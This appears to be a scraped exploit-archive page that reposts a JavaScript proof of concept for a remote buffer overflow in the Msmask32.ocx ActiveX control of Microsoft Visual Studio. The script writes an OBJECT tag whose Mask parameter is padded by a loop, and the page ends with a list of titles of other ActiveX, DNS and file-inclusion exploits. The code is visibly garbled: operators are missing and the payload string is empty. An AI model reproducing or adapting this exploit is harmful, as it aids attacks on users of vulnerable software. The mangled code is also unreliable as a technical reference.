var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i ){buf=buf unescape("");}
document.write(body buf body1);
【Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC】相关文章:
★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
★ Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
★ BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
★ Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit
★ Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
★ PPMate PPMedia Class ActiveX Control Buffer Overflow PoC